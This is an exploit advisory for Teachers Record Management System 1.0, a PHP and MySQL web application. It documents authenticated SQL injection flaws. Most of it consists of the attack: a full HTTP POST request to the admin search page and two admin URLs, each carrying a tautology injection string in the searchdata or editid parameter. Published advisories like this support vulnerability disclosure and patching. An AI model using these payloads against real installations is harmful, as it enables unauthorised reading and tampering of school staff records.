Teachers Record Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities. This report has additional payloads although the original discovery of SQL injection in this version is attributed to gh1mau in July of 2020.
c314128513b4635d95f6eb1300df19b2
# Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)
# Date: 05-10-2021
# Exploit Author: nhattruong or https://nhattruong.blog
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 + XAMPP v3.2.4
POC:
1. Go to url http://localhost/admin/index.php
2. Login with default creds
3. Execute the payload
Payload #1:
POST /admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://localhost
Connection: close
Referer: http://localhost/trms/admin/search.php
Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0
Upgrade-Insecure-Requests: 1
searchdata=a' or 1=1-- -&search=
Payload #2:
http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- -
Payload #3:
http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- -